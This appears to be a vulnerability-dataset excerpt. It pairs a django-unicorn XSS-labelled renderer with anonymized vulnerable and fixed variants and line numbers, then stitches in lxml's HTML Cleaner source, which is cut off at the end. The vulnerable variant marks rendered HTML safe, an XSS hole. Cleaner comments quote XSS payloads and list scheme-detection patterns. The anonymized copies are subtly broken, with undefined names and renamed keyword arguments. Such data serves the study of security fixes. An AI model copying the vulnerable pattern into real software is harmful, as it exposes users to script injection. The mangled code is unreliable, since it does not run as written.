import orjson
from bs4 import BeautifulSoup
from bs4.dammit import EntitySubstitution
from bs4.element import Tag
from bs4.formatter import HTMLFormatter
from django_unicorn.utils import sanitize_html
from ..decorators import timed
from ..utils import generate_checksum
logger = logging.getLogger(__name__)
class UnsortedAttributes(HTMLFormatter):
"""
Prevent beautifulsoup from re-ordering attributes.
"""
def __init__(self):
super().__init__(entity_substitution=EntitySubstitution.substitute_html)
def attributes(self, tag: Tag):
for k, v in tag.attrs.items():
yield k, v
class UnicornTemplateResponse(TemplateResponse):
def __init__(
self,
template,
request,
context=None,
content_type=None,
status=None,
charset=None,
using=None,
component=None,
init_js=False,
**kwargs,
):
super().__init__(
template=template,
request=request,
context=context,
content_type=content_type,
status=status,
charset=charset,
using=using,
)
self.component = component
self.init_js = init_js
@timed
def render(self):
response = super().render()
if not self.component or not self.component.component_id:
return response
content = response.content.decode("utf-8")
frontend_context_variables = self.component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
checksum = generate_checksum(orjson.dumps(frontend_context_variables_dict))
soup = BeautifulSoup(content, features="html.parser")
root_element = get_root_element(soup)
root_element["unicorn:id"] = self.component.component_id
root_element["unicorn:name"] = self.component.component_name
root_element["unicorn:key"] = self.component.component_key
root_element["unicorn:checksum"] = checksum
# Generate the hash based on the rendered content (without script tag)
hash = generate_checksum(UnicornTemplateResponse._desoupify(soup))
if self.init_js:
init = {
"id": self.component.component_id,
"name": self.component.component_name,
"key": self.component.component_key,
"data": orjson.loads(frontend_context_variables),
"calls": self.component.calls,
"hash": hash,
}
init = orjson.dumps(init).decode("utf-8")
json_element_id = f"unicorn:data:{self.component.component_id}"
init_script = f"Unicorn.componentInit(JSON.parse(document.getElementById('{json_element_id}').textContent));"
json_tag = soup.new_tag("script")
json_tag["type"] = "application/json"
json_tag["id"] = json_element_id
json_tag.string = sanitize_html(init)
if self.component.parent:
self.component._init_script = init_script
self.component._json_tag = json_tag
else:
json_tags = []
json_tags.append(json_tag)
for child in self.component.children:
init_script = f"{init_script} {child._init_script}"
json_tags.append(child._json_tag)
script_tag = soup.new_tag("script")
script_tag["type"] = "module"
script_tag.string = f"if (typeof Unicorn === 'undefined') {{ console.error('Unicorn is missing. Do you need {{% load unicorn %}} or {{% unicorn_scripts %}}?') }} else {{ {init_script} }}"
root_element.insert_after(script_tag)
for t in json_tags:
root_element.insert_after(t)
rendered_template = UnicornTemplateResponse._desoupify(soup)
self.component.rendered(rendered_template)
response.content = rendered_template
return response
@staticmethod
def _desoupify(soup):
soup.smooth()
return soup.encode(formatter=UnsortedAttributes()).decode("utf-8")
def get_root_element(soup: BeautifulSoup) -> Tag:
"""
Gets the first tag element.
Returns:
BeautifulSoup tag element.
Raises an Exception if an element cannot be found.
"""
for element in soup.contents:
if isinstance(element, Tag) and element.name:
return element
raise Exception("No root element found")
| xss | {
"code": [
"from django.utils.safestring import mark_safe",
" rendered_template = mark_safe(rendered_template)"
],
"line_no": [
4,
118
]
} | {
"code": [
"from bs4.dammit import EntitySubstitution",
" def __init__(self):",
" super().__init__(entity_substitution=EntitySubstitution.substitute_html)"
],
"line_no": [
7,
25,
26
]
} | import logging
from django.template.response import TemplateResponse
from django.utils.safestring import mark_safe
import orjson
from bs4 import BeautifulSoup
from bs4.element import Tag
from bs4.formatter import HTMLFormatter
from django_unicorn.utils import sanitize_html
from ..decorators import timed
from ..utils import generate_checksum
VAR_0 = logging.getLogger(__name__)
class CLASS_0(HTMLFormatter):
def FUNC_1(self, VAR_2: Tag):
for k, v in VAR_2.attrs.items():
yield k, v
class CLASS_1(TemplateResponse):
def __init__(
self,
VAR_3,
VAR_4,
VAR_5=None,
VAR_6=None,
VAR_7=None,
VAR_8=None,
VAR_9=None,
VAR_10=None,
VAR_11=False,
**VAR_12,
):
super().__init__(
VAR_3=template,
VAR_4=request,
VAR_5=context,
VAR_6=content_type,
VAR_7=status,
VAR_8=charset,
VAR_9=using,
)
self.component = VAR_10
self.init_js = VAR_11
@timed
def FUNC_2(self):
VAR_13 = super().render()
if not self.component or not self.component.component_id:
return VAR_13
VAR_14 = VAR_13.content.decode("utf-8")
VAR_15 = self.component.get_frontend_context_variables()
VAR_16 = orjson.loads(VAR_15)
VAR_17 = generate_checksum(orjson.dumps(VAR_16))
VAR_1 = BeautifulSoup(VAR_14, features="html.parser")
VAR_18 = FUNC_0(VAR_1)
VAR_18["unicorn:id"] = self.component.component_id
VAR_18["unicorn:name"] = self.component.component_name
VAR_18["unicorn:key"] = self.component.component_key
VAR_18["unicorn:checksum"] = VAR_17
VAR_19 = generate_checksum(CLASS_1._desoupify(VAR_1))
if self.init_js:
VAR_21 = {
"id": self.component.component_id,
"name": self.component.component_name,
"key": self.component.component_key,
"data": orjson.loads(VAR_15),
"calls": self.component.calls,
"hash": VAR_19,
}
VAR_21 = orjson.dumps(VAR_21).decode("utf-8")
VAR_22 = f"unicorn:data:{self.component.component_id}"
VAR_23 = f"Unicorn.componentInit(JSON.parse(document.getElementById('{VAR_22}').textContent));"
VAR_24 = VAR_1.new_tag("script")
VAR_24["type"] = "application/json"
VAR_24["id"] = VAR_22
VAR_24.string = sanitize_html(VAR_21)
if self.component.parent:
self.component._init_script = VAR_23
self.component._json_tag = VAR_24
else:
VAR_25 = []
json_tags.append(VAR_24)
for child in self.component.children:
VAR_23 = f"{VAR_23} {child._init_script}"
VAR_25.append(child._json_tag)
VAR_26 = VAR_1.new_tag("script")
VAR_26["type"] = "module"
VAR_26.string = f"if (typeof Unicorn === 'undefined') {{ console.error('Unicorn is missing. Do you need {{% load unicorn %}} or {{% unicorn_scripts %}}?') }} else {{ {VAR_23} }}"
VAR_18.insert_after(VAR_26)
for t in VAR_25:
VAR_18.insert_after(t)
VAR_20 = CLASS_1._desoupify(VAR_1)
VAR_20 = mark_safe(VAR_20)
self.component.rendered(VAR_20)
VAR_13.content = VAR_20
return VAR_13
@staticmethod
def FUNC_3(VAR_1):
VAR_1.smooth()
return VAR_1.encode(formatter=CLASS_0()).decode("utf-8")
def FUNC_0(VAR_1: BeautifulSoup) -> Tag:
for element in VAR_1.contents:
if isinstance(element, Tag) and element.name:
return element
raise Exception("No root element found")
| import logging
from django.template.response import TemplateResponse
import orjson
from bs4 import BeautifulSoup
from bs4.dammit import EntitySubstitution
from bs4.element import Tag
from bs4.formatter import HTMLFormatter
from django_unicorn.utils import sanitize_html
from ..decorators import timed
from ..utils import generate_checksum
VAR_0 = logging.getLogger(__name__)
class CLASS_0(HTMLFormatter):
def __init__(self):
super().__init__(entity_substitution=EntitySubstitution.substitute_html)
def FUNC_1(self, VAR_2: Tag):
for k, v in VAR_2.attrs.items():
yield k, v
class CLASS_1(TemplateResponse):
def __init__(
self,
VAR_3,
VAR_4,
VAR_5=None,
VAR_6=None,
VAR_7=None,
VAR_8=None,
VAR_9=None,
VAR_10=None,
VAR_11=False,
**VAR_12,
):
super().__init__(
VAR_3=template,
VAR_4=request,
VAR_5=context,
VAR_6=content_type,
VAR_7=status,
VAR_8=charset,
VAR_9=using,
)
self.component = VAR_10
self.init_js = VAR_11
@timed
def FUNC_2(self):
VAR_13 = super().render()
if not self.component or not self.component.component_id:
return VAR_13
VAR_14 = VAR_13.content.decode("utf-8")
VAR_15 = self.component.get_frontend_context_variables()
VAR_16 = orjson.loads(VAR_15)
VAR_17 = generate_checksum(orjson.dumps(VAR_16))
VAR_1 = BeautifulSoup(VAR_14, features="html.parser")
VAR_18 = FUNC_0(VAR_1)
VAR_18["unicorn:id"] = self.component.component_id
VAR_18["unicorn:name"] = self.component.component_name
VAR_18["unicorn:key"] = self.component.component_key
VAR_18["unicorn:checksum"] = VAR_17
VAR_19 = generate_checksum(CLASS_1._desoupify(VAR_1))
if self.init_js:
VAR_21 = {
"id": self.component.component_id,
"name": self.component.component_name,
"key": self.component.component_key,
"data": orjson.loads(VAR_15),
"calls": self.component.calls,
"hash": VAR_19,
}
VAR_21 = orjson.dumps(VAR_21).decode("utf-8")
VAR_22 = f"unicorn:data:{self.component.component_id}"
VAR_23 = f"Unicorn.componentInit(JSON.parse(document.getElementById('{VAR_22}').textContent));"
VAR_24 = VAR_1.new_tag("script")
VAR_24["type"] = "application/json"
VAR_24["id"] = VAR_22
VAR_24.string = sanitize_html(VAR_21)
if self.component.parent:
self.component._init_script = VAR_23
self.component._json_tag = VAR_24
else:
VAR_25 = []
json_tags.append(VAR_24)
for child in self.component.children:
VAR_23 = f"{VAR_23} {child._init_script}"
VAR_25.append(child._json_tag)
VAR_26 = VAR_1.new_tag("script")
VAR_26["type"] = "module"
VAR_26.string = f"if (typeof Unicorn === 'undefined') {{ console.error('Unicorn is missing. Do you need {{% load unicorn %}} or {{% unicorn_scripts %}}?') }} else {{ {VAR_23} }}"
VAR_18.insert_after(VAR_26)
for t in VAR_25:
VAR_18.insert_after(t)
VAR_20 = CLASS_1._desoupify(VAR_1)
self.component.rendered(VAR_20)
VAR_13.content = VAR_20
return VAR_13
@staticmethod
def FUNC_3(VAR_1):
VAR_1.smooth()
return VAR_1.encode(formatter=CLASS_0()).decode("utf-8")
def FUNC_0(VAR_1: BeautifulSoup) -> Tag:
for element in VAR_1.contents:
if isinstance(element, Tag) and element.name:
return element
raise Exception("No root element found")
| [
2,
5,
10,
12,
15,
16,
18,
19,
24,
28,
29,
53,
56,
60,
63,
65,
69,
76,
77,
79,
92,
97,
104,
108,
113,
116,
120,
122,
124,
129,
130,
134,
137,
143,
145,
21,
22,
23,
132,
133,
134,
135,
136,
137,
138,
139
] | [
2,
4,
10,
12,
15,
16,
18,
19,
24,
27,
31,
32,
56,
59,
63,
66,
68,
72,
79,
80,
82,
95,
100,
107,
111,
116,
119,
122,
124,
126,
131,
132,
136,
139,
145,
147,
21,
22,
23,
134,
135,
136,
137,
138,
139,
140,
141
] |
1CWE-79
| # cython: language_level=3str
"""A cleanup tool for HTML.
Removes unwanted tags and content. See the `Cleaner` class for
details.
"""
from __future__ import absolute_import
import copy
import re
import sys
try:
from urlparse import urlsplit
from urllib import unquote_plus
except ImportError:
# Python 3
from urllib.parse import urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
unichr
except NameError:
# Python 3
unichr = chr
try:
unicode
except NameError:
# Python 3
unicode = str
try:
basestring
except NameError:
basestring = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl
# Particularly the CSS cleaning; most of the tag cleaning is integrated now
# I have multiple kinds of schemes searched; but should schemes be
# whitelisted instead?
# max height?
# remove images? Also in CSS? background attribute?
# Some way to whitelist object, iframe, etc (e.g., if you want to
# allow *just* embedded YouTube movies)
# Log what was deleted and why?
# style="behavior: ..." might be bad in IE?
# Should we have something for just <meta http-equiv>? That's the worst of the
# metas.
# UTF-7 detections? Example:
# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
# you don't always have to have the charset set, if the page has no charset
# and there's UTF7-like code in it.
# Look at these tests: http://htmlpurifier.org/live/smoketests/xssAttacks.php
# This is an IE-specific construct you can have in a stylesheet to
# run some Javascript:
_replace_css_javascript = re.compile(
r'expression\s*\(.*?\)', re.S|re.I).sub
# Do I have to worry about @\nimport?
_replace_css_import = re.compile(
r'@\s*import', re.I).sub
_looks_like_tag_content = re.compile(
r'</?[a-zA-Z]+|\son[a-zA-Z]+\s*=',
*((re.ASCII,) if sys.version_info[0] >= 3 else ())).search
# All kinds of schemes besides just javascript: that can cause
# execution:
_is_image_dataurl = re.compile(
r'^data:image/.+;base64', re.I).search
_is_possibly_malicious_scheme = re.compile(
r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def _is_javascript_scheme(s):
if _is_image_dataurl(s):
return None
return _is_possibly_malicious_scheme(s)
_substitute_whitespace = re.compile(r'[\s\x00-\x08\x0B\x0C\x0E-\x19]+').sub
# FIXME: should data: be blocked?
# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx
_conditional_comment_re = re.compile(
r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S)
_find_styled_elements = etree.XPath(
"descendant-or-self::*[@style]")
_find_external_links = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class Cleaner(object):
"""
Instances cleans the document of each of the possible offending
elements. The cleaning is controlled by attributes; you can
override attributes in a subclass, or set them in the constructor.
``scripts``:
Removes any ``<script>`` tags.
``javascript``:
Removes any Javascript, like an ``onclick`` attribute. Also removes stylesheets
as they could contain Javascript.
``comments``:
Removes any comments.
``style``:
Removes any style tags.
``inline_style``
Removes any style attributes. Defaults to the value of the ``style`` option.
``links``:
Removes any ``<link>`` tags
``meta``:
Removes any ``<meta>`` tags
``page_structure``:
Structural parts of a page: ``<head>``, ``<html>``, ``<title>``.
``processing_instructions``:
Removes any processing instructions.
``embedded``:
Removes any embedded objects (flash, iframes)
``frames``:
Removes any frame-related tags
``forms``:
Removes any form tags
``annoying_tags``:
Tags that aren't *wrong*, but are annoying. ``<blink>`` and ``<marquee>``
``remove_tags``:
A list of tags to remove. Only the tags will be removed,
their content will get pulled up into the parent tag.
``kill_tags``:
A list of tags to kill. Killing also removes the tag's content,
i.e. the whole subtree, not just the tag itself.
``allow_tags``:
A list of tags to include (default include all).
``remove_unknown_tags``:
Remove any tags that aren't standard parts of HTML.
``safe_attrs_only``:
If true, only include 'safe' attributes (specifically the list
from the feedparser HTML sanitisation web site).
``safe_attrs``:
A set of attribute names to override the default list of attributes
considered 'safe' (when safe_attrs_only=True).
``add_nofollow``:
If true, then any <a> tags will have ``rel="nofollow"`` added to them.
``host_whitelist``:
A list or set of hosts that you can use for embedded content
(for content like ``<object>``, ``<link rel="stylesheet">``, etc).
You can also implement/override the method
``allow_embedded_url(el, url)`` or ``allow_element(el)`` to
implement more complex rules for what can be embedded.
Anything that passes this test will be shown, regardless of
the value of (for instance) ``embedded``.
Note that this parameter might not work as intended if you do not
make the links absolute before doing the cleaning.
Note that you may also need to set ``whitelist_tags``.
``whitelist_tags``:
A set of tags that can be included with ``host_whitelist``.
The default is ``iframe`` and ``embed``; you may wish to
include other tags like ``script``, or you may want to
implement ``allow_embedded_url`` for more control. Set to None to
include all tags.
This modifies the document *in place*.
"""
scripts = True
javascript = True
comments = True
style = False
inline_style = None
links = True
meta = True
page_structure = True
processing_instructions = True
embedded = True
frames = True
forms = True
annoying_tags = True
remove_tags = None
allow_tags = None
kill_tags = None
remove_unknown_tags = True
safe_attrs_only = True
safe_attrs = defs.safe_attrs
add_nofollow = False
host_whitelist = ()
whitelist_tags = {'iframe', 'embed'}
def __init__(self, **kw):
not_an_attribute = object()
for name, value in kw.items():
default = getattr(self, name, not_an_attribute)
if (default is not None and default is not True and default is not False
and not isinstance(default, (frozenset, set, tuple, list))):
raise TypeError(
"Unknown parameter: %s=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in kw:
self.inline_style = self.style
if kw.get("allow_tags"):
if kw.get("remove_unknown_tags"):
raise ValueError("It does not make sense to pass in both "
"allow_tags and remove_unknown_tags")
self.remove_unknown_tags = False
# Used to lookup the primary URL for a given tag that is up for
# removal:
_tag_link_attrs = dict(
script='src',
link='href',
# From: http://java.sun.com/j2se/1.4.2/docs/guide/misc/applet.html
# From what I can tell, both attributes can contain a link:
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
# FIXME: there doesn't really seem like a general way to figure out what
# links an <object> tag uses; links often go in <param> tags with values
# that we don't really know. You'd have to have knowledge about specific
# kinds of plugins (probably keyed off classid), and match against those.
##object=?,
# FIXME: not looking at the action currently, because it is more complex
# than than -- if you keep the form, you should keep the form controls.
##form='action',
a='href',
)
def __call__(self, doc):
"""
Cleans the document.
"""
try:
getroot = doc.getroot
except AttributeError:
pass # Element instance
else:
doc = getroot() # ElementTree instance, instead of an element
# convert XHTML to HTML
xhtml_to_html(doc)
# Normalize a case that IE treats <image> like <img>, and that
# can confuse either this step or later steps.
for el in doc.iter('image'):
el.tag = 'img'
if not self.comments:
# Of course, if we were going to kill comments anyway, we don't
# need to worry about this
self.kill_conditional_comments(doc)
kill_tags = set(self.kill_tags or ())
remove_tags = set(self.remove_tags or ())
allow_tags = set(self.allow_tags or ())
if self.scripts:
kill_tags.add('script')
if self.safe_attrs_only:
safe_attrs = set(self.safe_attrs)
for el in doc.iter(etree.Element):
attrib = el.attrib
for aname in attrib.keys():
if aname not in safe_attrs:
del attrib[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
# safe_attrs handles events attributes itself
for el in doc.iter(etree.Element):
attrib = el.attrib
for aname in attrib.keys():
if aname.startswith('on'):
del attrib[aname]
doc.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
# If we're deleting style then we don't have to remove JS links
# from styles, otherwise...
if not self.inline_style:
for el in _find_styled_elements(doc):
old = el.get('style')
new = _replace_css_javascript('', old)
new = _replace_css_import('', new)
if self._has_sneaky_javascript(new):
# Something tricky is going on...
del el.attrib['style']
elif new != old:
el.set('style', new)
if not self.style:
for el in list(doc.iter('style')):
if el.get('type', '').lower().strip() == 'text/javascript':
el.drop_tree()
continue
old = el.text or ''
new = _replace_css_javascript('', old)
# The imported CSS can do anything; we just can't allow:
new = _replace_css_import('', new)
if self._has_sneaky_javascript(new):
# Something tricky is going on...
el.text = '/* deleted */'
elif new != old:
el.text = new
if self.comments:
kill_tags.add(etree.Comment)
if self.processing_instructions:
kill_tags.add(etree.ProcessingInstruction)
if self.style:
kill_tags.add('style')
if self.inline_style:
etree.strip_attributes(doc, 'style')
if self.links:
kill_tags.add('link')
elif self.style or self.javascript:
# We must get rid of included stylesheets if Javascript is not
# allowed, as you can put Javascript in them
for el in list(doc.iter('link')):
if 'stylesheet' in el.get('rel', '').lower():
# Note this kills alternate stylesheets as well
if not self.allow_element(el):
el.drop_tree()
if self.meta:
kill_tags.add('meta')
if self.page_structure:
remove_tags.update(('head', 'html', 'title'))
if self.embedded:
# FIXME: is <layer> really embedded?
# We should get rid of any <param> tags not inside <applet>;
# These are not really valid anyway.
for el in list(doc.iter('param')):
parent = el.getparent()
while parent is not None and parent.tag not in ('applet', 'object'):
parent = parent.getparent()
if parent is None:
el.drop_tree()
kill_tags.update(('applet',))
# The alternate contents that are in an iframe are a good fallback:
remove_tags.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
# FIXME: ideally we should look at the frame links, but
# generally frames don't mix properly with an HTML
# fragment anyway.
kill_tags.update(defs.frame_tags)
if self.forms:
remove_tags.add('form')
kill_tags.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
remove_tags.update(('blink', 'marquee'))
_remove = []
_kill = []
for el in doc.iter():
if el.tag in kill_tags:
if self.allow_element(el):
continue
_kill.append(el)
elif el.tag in remove_tags:
if self.allow_element(el):
continue
_remove.append(el)
if _remove and _remove[0] == doc:
# We have to drop the parent-most tag, which we can't
# do. Instead we'll rewrite it:
el = _remove.pop(0)
el.tag = 'div'
el.attrib.clear()
elif _kill and _kill[0] == doc:
# We have to drop the parent-most element, which we can't
# do. Instead we'll clear it:
el = _kill.pop(0)
if el.tag != 'html':
el.tag = 'div'
el.clear()
_kill.reverse() # start with innermost tags
for el in _kill:
el.drop_tree()
for el in _remove:
el.drop_tag()
if self.remove_unknown_tags:
if allow_tags:
raise ValueError(
"It does not make sense to pass in both allow_tags and remove_unknown_tags")
allow_tags = set(defs.tags)
if allow_tags:
# make sure we do not remove comments/PIs if users want them (which is rare enough)
if not self.comments:
allow_tags.add(etree.Comment)
if not self.processing_instructions:
allow_tags.add(etree.ProcessingInstruction)
bad = []
for el in doc.iter():
if el.tag not in allow_tags:
bad.append(el)
if bad:
if bad[0] is doc:
el = bad.pop(0)
el.tag = 'div'
el.attrib.clear()
for el in bad:
el.drop_tag()
if self.add_nofollow:
for el in _find_external_links(doc):
if not self.allow_follow(el):
rel = el.get('rel')
if rel:
if ('nofollow' in rel
and ' nofollow ' in (' %s ' % rel)):
continue
rel = '%s nofollow' % rel
else:
rel = 'nofollow'
el.set('rel', rel)
def allow_follow(self, anchor):
"""
Override to suppress rel="nofollow" on some anchors.
"""
return False
def allow_element(self, el):
"""
Decide whether an element is configured to be accepted or rejected.
:param el: an element.
:return: true to accept the element or false to reject/discard it.
"""
if el.tag not in self._tag_link_attrs:
return False
attr = self._tag_link_attrs[el.tag]
if isinstance(attr, (list, tuple)):
for one_attr in attr:
url = el.get(one_attr)
if not url:
return False
if not self.allow_embedded_url(el, url):
return False
return True
else:
url = el.get(attr)
if not url:
return False
return self.allow_embedded_url(el, url)
def allow_embedded_url(self, el, url):
"""
Decide whether a URL that was found in an element's attributes or text
if configured to be accepted or rejected.
:param el: an element.
:param url: a URL found on the element.
:return: true to accept the URL and false to reject it.
"""
if self.whitelist_tags is not None and el.tag not in self.whitelist_tags:
return False
scheme, netloc, path, query, fragment = urlsplit(url)
netloc = netloc.lower().split(':', 1)[0]
if scheme not in ('http', 'https'):
return False
if netloc in self.host_whitelist:
return True
return False
def kill_conditional_comments(self, doc):
"""
IE conditional comments basically embed HTML that the parser
doesn't normally see. We can't allow anything like that, so
we'll kill any comments that could be conditional.
"""
has_conditional_comment = _conditional_comment_re.search
self._kill_elements(
doc, lambda el: has_conditional_comment(el.text),
etree.Comment)
def _kill_elements(self, doc, condition, iterate=None):
bad = []
for el in doc.iter(iterate):
if condition(el):
bad.append(el)
for el in bad:
el.drop_tree()
def _remove_javascript_link(self, link):
# links like "j a v a s c r i p t:" might be interpreted in IE
new = _substitute_whitespace('', unquote_plus(link))
if _is_javascript_scheme(new):
# FIXME: should this be None to delete?
return ''
return link
_substitute_comments = re.compile(r'/\*.*?\*/', re.S).sub
def _has_sneaky_javascript(self, style):
"""
Depending on the browser, stuff like ``e x p r e s s i o n(...)``
can get interpreted, or ``expre/* stuff */ssion(...)``. This
checks for attempt to do stuff like this.
Typically the response will be to kill the entire style; if you
have just a bit of Javascript in the style another rule will catch
that and remove only the Javascript from the style; this catches
more sneaky attempts.
"""
style = self._substitute_comments('', style)
style = style.replace('\\', '')
style = _substitute_whitespace('', style)
style = style.lower()
if 'javascript:' in style:
return True
if 'expression(' in style:
return True
if '@import' in style:
return True
if '</noscript' in style:
# e.g. '<noscript><style><a title="</noscript><img src=x onerror=alert(1)>">'
return True
if _looks_like_tag_content(style):
# e.g. '<math><style><img src=x onerror=alert(1)></style></math>'
return True
return False
def clean_html(self, html):
result_type = type(html)
if isinstance(html, basestring):
doc = fromstring(html)
else:
doc = copy.deepcopy(html)
self(doc)
return _transform_result(result_type, doc)
clean = Cleaner()
clean_html = clean.clean_html
############################################################
## Autolinking
############################################################
_link_regexes = [
re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
# This is conservative, but autolinking can be a bit conservative:
re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_.-]+[a-z]))', re.I),
]
_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a']
_avoid_hosts = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
_avoid_classes = ['nolink']
def autolink(el, link_regexes=_link_regexes,
avoid_elements=_avoid_elements,
avoid_hosts=_avoid_hosts,
avoid_classes=_avoid_classes):
"""
Turn any URLs into links.
It will search for links identified by the given regular
expressions (by default mailto and http(s) links).
It won't link text in an element in avoid_elements, or an element
with a class in avoid_classes. It won't link to anything with a
host that matches one of the regular expressions in avoid_hosts
(default localhost and 127.0.0.1).
If you pass in an element, the element's tail will not be
substituted, only the contents of the element.
"""
if el.tag in avoid_elements:
return
class_name = el.get('class')
if class_name:
class_name = class_name.split()
for match_class in avoid_classes:
if match_class in class_name:
return
for child in list(el):
autolink(child, link_regexes=link_regexes,
avoid_elements=avoid_elements,
avoid_hosts=avoid_hosts,
avoid_classes=avoid_classes)
if child.tail:
text, tail_children = _link_text(
child.tail, link_regexes, avoid_hosts, factory=el.makeelement)
if tail_children:
child.tail = text
index = el.index(child)
el[index+1:index+1] = tail_children
if el.text:
text, pre_children = _link_text(
el.text, link_regexes, avoid_hosts, factory=el.makeelement)
if pre_children:
el.text = text
el[:0] = pre_children
def _link_text(text, link_regexes, avoid_hosts, factory):
leading_text = ''
links = []
last_pos = 0
while 1:
best_match, best_pos = None, None
for regex in link_regexes:
regex_pos = last_pos
while 1:
match = regex.search(text, pos=regex_pos)
if match is None:
break
host = match.group('host')
for host_regex in avoid_hosts:
if host_regex.search(host):
regex_pos = match.end()
break
else:
break
if match is None:
continue
if best_pos is None or match.start() < best_pos:
best_match = match
best_pos = match.start()
if best_match is None:
# No more matches
if links:
assert not links[-1].tail
links[-1].tail = text
else:
assert not leading_text
leading_text = text
break
link = best_match.group(0)
end = best_match.end()
if link.endswith('.') or link.endswith(','):
# These punctuation marks shouldn't end a link
end -= 1
link = link[:-1]
prev_text = text[:best_match.start()]
if links:
assert not links[-1].tail
links[-1].tail = prev_text
else:
assert not leading_text
leading_text = prev_text
anchor = factory('a')
anchor.set('href', link)
body = best_match.group('body')
if not body:
body = link
if body.endswith('.') or body.endswith(','):
body = body[:-1]
anchor.text = body
links.append(anchor)
text = text[end:]
return leading_text, links
def autolink_html(html, *args, **kw):
result_type = type(html)
if isinstance(html, basestring):
doc = fromstring(html)
else:
doc = copy.deepcopy(html)
autolink(doc, *args, **kw)
return _transform_result(result_type, doc)
autolink_html.__doc__ = autolink.__doc__
############################################################
## Word wrapping
############################################################
_avoid_word_break_elements = ['pre', 'textarea', 'code']
_avoid_word_break_classes = ['nobreak']
def word_break(el, max_width=40,
avoid_elements=_avoid_word_break_elements,
avoid_classes=_avoid_word_break_classes,
break_character=unichr(0x200b)):
"""
Breaks any long words found in the body of the text (not attributes).
Doesn't effect any of the tags in avoid_elements, by default
``<textarea>`` and ``<pre>``
Breaks words by inserting ​, which is a unicode character
for Zero Width Space character. This generally takes up no space
in rendering, but does copy as a space, and in monospace contexts
usually takes up space.
See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion
"""
# Character suggestion of ​ comes from:
# http://www.cs.tut.fi/~jkorpela/html/nobr.html
if el.tag in _avoid_word_break_elements:
return
class_name = el.get('class')
if class_name:
dont_break = False
class_name = class_name.split()
for avoid in avoid_classes:
if avoid in class_name:
dont_break = True
break
if dont_break:
return
if el.text:
el.text = _break_text(el.text, max_width, break_character)
for child in el:
word_break(child, max_width=max_width,
avoid_elements=avoid_elements,
avoid_classes=avoid_classes,
break_character=break_character)
if child.tail:
child.tail = _break_text(child.tail, max_width, break_character)
def word_break_html(html, *args, **kw):
result_type = type(html)
doc = fromstring(html)
word_break(doc, *args, **kw)
return _transform_result(result_type, doc)
def _break_text(text, max_width, break_character):
words = text.split()
for word in words:
if len(word) > max_width:
replacement = _insert_break(word, max_width, break_character)
text = text.replace(word, replacement)
return text
_break_prefer_re = re.compile(r'[^a-z]', re.I)
def _insert_break(word, width, break_character):
orig_word = word
result = ''
while len(word) > width:
start = word[:width]
breaks = list(_break_prefer_re.finditer(start))
if breaks:
last_break = breaks[-1]
# Only walk back up to 10 characters to find a nice break:
if last_break.end() > width-10:
# FIXME: should the break character be at the end of the
# chunk, or the beginning of the next chunk?
start = word[:last_break.end()]
result += start + break_character
word = word[len(start):]
result += word
return result
| # cython: language_level=3str
"""A cleanup tool for HTML.
Removes unwanted tags and content. See the `Cleaner` class for
details.
"""
from __future__ import absolute_import
import copy
import re
import sys
try:
from urlparse import urlsplit
from urllib import unquote_plus
except ImportError:
# Python 3
from urllib.parse import urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
unichr
except NameError:
# Python 3
unichr = chr
try:
unicode
except NameError:
# Python 3
unicode = str
try:
basestring
except NameError:
basestring = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl
# Particularly the CSS cleaning; most of the tag cleaning is integrated now
# I have multiple kinds of schemes searched; but should schemes be
# whitelisted instead?
# max height?
# remove images? Also in CSS? background attribute?
# Some way to whitelist object, iframe, etc (e.g., if you want to
# allow *just* embedded YouTube movies)
# Log what was deleted and why?
# style="behavior: ..." might be bad in IE?
# Should we have something for just <meta http-equiv>? That's the worst of the
# metas.
# UTF-7 detections? Example:
# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
# you don't always have to have the charset set, if the page has no charset
# and there's UTF7-like code in it.
# Look at these tests: http://htmlpurifier.org/live/smoketests/xssAttacks.php
# This is an IE-specific construct you can have in a stylesheet to
# run some Javascript:
_replace_css_javascript = re.compile(
r'expression\s*\(.*?\)', re.S|re.I).sub
# Do I have to worry about @\nimport?
_replace_css_import = re.compile(
r'@\s*import', re.I).sub
_looks_like_tag_content = re.compile(
